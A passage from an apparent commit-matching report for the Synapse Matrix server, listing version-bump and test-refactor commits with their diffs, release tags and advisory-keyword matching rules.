following keywords: resolve", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: python", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 72", - "relevance": 2 - } - ] - }, - { - "commit_id": "1cec3d145770b52a7588cdf9df552189da634c5f", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607510499, - "hunks": 4, - "message": "1.23.1", - "diff": [ - "diff --git a/changelog.d/8776.bugfix b/changelog.d/8776.bugfix", - "deleted file mode 100644", - "index dd7ebbeb8..000000000", - "--- a/changelog.d/8776.bugfix", - "+++ /dev/null", - "@@ -1 +0,0 @@", - "-Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body.", - "diff --git a/changelog.d/8898.misc b/changelog.d/8898.misc", - "deleted file mode 100644", - "index bdb0d40d5..000000000", - "--- a/changelog.d/8898.misc", - "+++ /dev/null", - "@@ -1 +0,0 @@", - "-Add a maximum version for pysaml2 on Python 3.5.", - "diff --git a/debian/changelog b/debian/changelog", - "index 4ea4feddd..0342fafdd 100644", - "--- a/debian/changelog", - "+++ b/debian/changelog", - "@@ -1 +1,7 @@", - "+matrix-synapse-py3 (1.23.1) stable; urgency=medium", - "+", - "+ * New synapse release 1.23.1.", - "+", - "+ -- Synapse Packaging team Wed, 09 Dec 2020 10:40:39 +0000", - "+", - " matrix-synapse-py3 (1.23.0) stable; urgency=medium", - "diff --git a/synapse/__init__.py b/synapse/__init__.py", - "index 65c1f5aa3..c38a8f613 100644", - "--- a/synapse/__init__.py", - "+++ b/synapse/__init__.py", - "@@ -50,3 +50,3 @@ except ImportError:", - "-__version__ = \"1.23.0\"", - "+__version__ = \"1.23.1\"" - ], - "changed_files": [ - "changelog.d/8776.bugfix", - "changelog.d/8898.misc", - "debian/changelog", - "synapse/__init__.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.23.1", - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", - "relevance": 8 - } - ] - }, - { - "commit_id": "7eebe4b3fc3129e4571d58c3cea5eeccc584e072", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608043885, - "hunks": 22, - "message": "Replace `request.code` with `channel.code` The two are equivalent, but really we want to check the HTTP result that got returned to the channel, not the code that the Request object *intended* to return to the channel.", - "diff": [ - "diff --git a/tests/http/test_additional_resource.py b/tests/http/test_additional_resource.py", - "index 05e9c449b..adc318caa 100644", - "--- a/tests/http/test_additional_resource.py", - "+++ b/tests/http/test_additional_resource.py", - "@@ -50,3 +50,3 @@ class AdditionalResourceTests(HomeserverTestCase):", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - " self.assertEqual(channel.json_body, {\"some_key\": \"some_value_async\"})", - "@@ -59,3 +59,3 @@ class AdditionalResourceTests(HomeserverTestCase):", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - " self.assertEqual(channel.json_body, {\"some_key\": \"some_value_sync\"})", - "diff --git a/tests/replication/test_auth.py b/tests/replication/test_auth.py", - "index fe9e4d5f9..aee839dc6 100644", - "--- a/tests/replication/test_auth.py", - "+++ b/tests/replication/test_auth.py", - "@@ -68,3 +68,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " ) # type: SynapseRequest, FakeChannel", - "- self.assertEqual(request_1.code, 401)", - "+ self.assertEqual(channel_1.code, 401)", - "@@ -86,3 +86,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " request, channel = self._test_register()", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - "@@ -96,3 +96,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " request, channel = self._test_register()", - "- self.assertEqual(request.code, 500)", - "+ self.assertEqual(channel.code, 500)", - "@@ -108,3 +108,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " request, channel = self._test_register()", - "- self.assertEqual(request.code, 500)", - "+ self.assertEqual(channel.code, 500)", - "@@ -115,3 +115,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " request, channel = self._test_register()", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - "diff --git a/tests/replication/test_client_reader_shard.py b/tests/replication/test_client_reader_shard.py", - "index fdaad3d8a..6cdf6a099 100644", - "--- a/tests/replication/test_client_reader_shard.py", - "+++ b/tests/replication/test_client_reader_shard.py", - "@@ -50,3 +50,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " ) # type: SynapseRequest, FakeChannel", - "- self.assertEqual(request_1.code, 401)", - "+ self.assertEqual(channel_1.code, 401)", - "@@ -63,3 +63,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " ) # type: SynapseRequest, FakeChannel", - "- self.assertEqual(request_2.code, 200)", - "+ self.assertEqual(channel_2.code, 200)", - "@@ -82,3 +82,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " ) # type: SynapseRequest, FakeChannel", - "- self.assertEqual(request_1.code, 401)", - "+ self.assertEqual(channel_1.code, 401)", - "@@ -96,3 +96,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " ) # type: SynapseRequest, FakeChannel", - "- self.assertEqual(request_2.code, 200)", - "+ self.assertEqual(channel_2.code, 200)", - "diff --git a/tests/rest/client/v2_alpha/test_account.py b/tests/rest/client/v2_alpha/test_account.py", - "index 2ac1ecb7d..11a042f9e 100644", - "--- a/tests/rest/client/v2_alpha/test_account.py", - "+++ b/tests/rest/client/v2_alpha/test_account.py", - "@@ -355,3 +355,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", - " request, channel = self.make_request(\"GET\", \"account/whoami\")", - "- self.assertEqual(request.code, 401)", - "+ self.assertEqual(channel.code, 401)", - "@@ -412,3 +412,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", - " )", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", - "index ac67a9de2..a35c2646f 100644", - "--- a/tests/rest/client/v2_alpha/test_auth.py", - "+++ b/tests/rest/client/v2_alpha/test_auth.py", - "@@ -73,3 +73,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", - "- self.assertEqual(request.code, expected_response)", - "+ self.assertEqual(channel.code, expected_response)", - " return channel", - "@@ -86,3 +86,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", - " ) # type: SynapseRequest, FakeChannel", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - "@@ -94,3 +94,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", - " )", - "- self.assertEqual(request.code, expected_post_response)", - "+ self.assertEqual(channel.code, expected_post_response)", - "@@ -203,3 +203,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # Ensure the response is sane.", - "- self.assertEqual(request.code, expected_response)", - "+ self.assertEqual(channel.code, expected_response)", - "@@ -216,3 +216,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # Ensure the response is sane.", - "- self.assertEqual(request.code, expected_response)", - "+ self.assertEqual(channel.code, expected_response)", - "diff --git a/tests/rest/client/v2_alpha/test_register.py b/tests/rest/client/v2_alpha/test_register.py", - "index bcb21d0ce..4bf3e0d63 100644", - "--- a/tests/rest/client/v2_alpha/test_register.py", - "+++ b/tests/rest/client/v2_alpha/test_register.py", - "@@ -561,3 +561,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", - " )", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - "diff --git a/tests/rest/test_health.py b/tests/rest/test_health.py", - "index 02a46e5fd..aaf2fb821 100644", - "--- a/tests/rest/test_health.py", - "+++ b/tests/rest/test_health.py", - "@@ -29,3 +29,3 @@ class HealthCheckTests(unittest.HomeserverTestCase):", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - " self.assertEqual(channel.result[\"body\"], b\"OK\")", - "diff --git a/tests/rest/test_well_known.py b/tests/rest/test_well_known.py", - "index 6a930f414..17ded96b9 100644", - "--- a/tests/rest/test_well_known.py", - "+++ b/tests/rest/test_well_known.py", - "@@ -34,3 +34,3 @@ class WellKnownTests(unittest.HomeserverTestCase):", - "- self.assertEqual(request.code, 200)", - "+ self.assertEqual(channel.code, 200)", - " self.assertEqual(", - "@@ -50,2 +50,2 @@ class WellKnownTests(unittest.HomeserverTestCase):", - "- self.assertEqual(request.code, 404)", - "+ self.assertEqual(channel.code, 404)" - ], - "changed_files": [ - "tests/http/test_additional_resource.py", - "tests/replication/test_auth.py", - "tests/replication/test_client_reader_shard.py", - "tests/rest/client/v2_alpha/test_account.py", - "tests/rest/client/v2_alpha/test_auth.py", - "tests/rest/client/v2_alpha/test_register.py", - "tests/rest/test_health.py", - "tests/rest/test_well_known.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: request", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: know, resource", - "relevance": 4 - } - ] - }, - { - "commit_id": "9b26a4ac87cead4846c5bada73927cc2a6353a90", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607510061, - "hunks": 3, - "message": "1.24.0", - "diff": [ - "diff --git a/changelog.d/8898.misc b/changelog.d/8898.misc", - "deleted file mode 100644", - "index bdb0d40d5..000000000", - "--- a/changelog.d/8898.misc", - "+++ /dev/null", - "@@ -1 +0,0 @@", - "-Add a maximum version for pysaml2 on Python 3.5.", - "diff --git a/debian/changelog b/debian/changelog", - "index 4ea4feddd..9f47d12b7 100644", - "--- a/debian/changelog", - "+++ b/debian/changelog", - "@@ -1 +1,7 @@", - "+matrix-synapse-py3 (1.24.0) stable; urgency=medium", - "+", - "+ * New synapse release 1.24.0.", - "+", - "+ -- Synapse Packaging team Wed, 09 Dec 2020 10:14:30 +0000", - "+", - " matrix-synapse-py3 (1.23.0) stable; urgency=medium", - "diff --git a/synapse/__init__.py b/synapse/__init__.py", - "index 2e354f2cc..f2d3ac68e 100644", - "--- a/synapse/__init__.py", - "+++ b/synapse/__init__.py", - "@@ -50,3 +50,3 @@ except ImportError:", - "-__version__ = \"1.24.0rc2\"", - "+__version__ = \"1.24.0\"" - ], - "changed_files": [ - "changelog.d/8898.misc", - "debian/changelog", - "synapse/__init__.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.24.0", - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", - "relevance": 8 - } - ] - }, - { - "commit_id": "5bcf6e8289b075ef298510faae12041811bbd344", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608044081, - "hunks": 2, - "message": "Skip redundant check on `request.args`", - "diff": [ - "diff --git a/tests/test_server.py b/tests/test_server.py", - "index 6b2d2f040..0be8c7e2f 100644", - "--- a/tests/test_server.py", - "+++ b/tests/test_server.py", - "@@ -66,3 +66,3 @@ class JsonResourceTests(unittest.TestCase):", - "- request, channel = make_request(", - "+ make_request(", - " self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo/%E2%98%83?a=%E2%98%83\"", - "@@ -70,3 +70,2 @@ class JsonResourceTests(unittest.TestCase):", - "- self.assertEqual(request.args, {b\"a\": [\"\\N{SNOWMAN}\".encode(\"utf8\")]})", - " self.assertEqual(got_kwargs, {\"room_id\": \"\\N{SNOWMAN}\"})" - ], - "changed_files": [ - "tests/test_server.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - 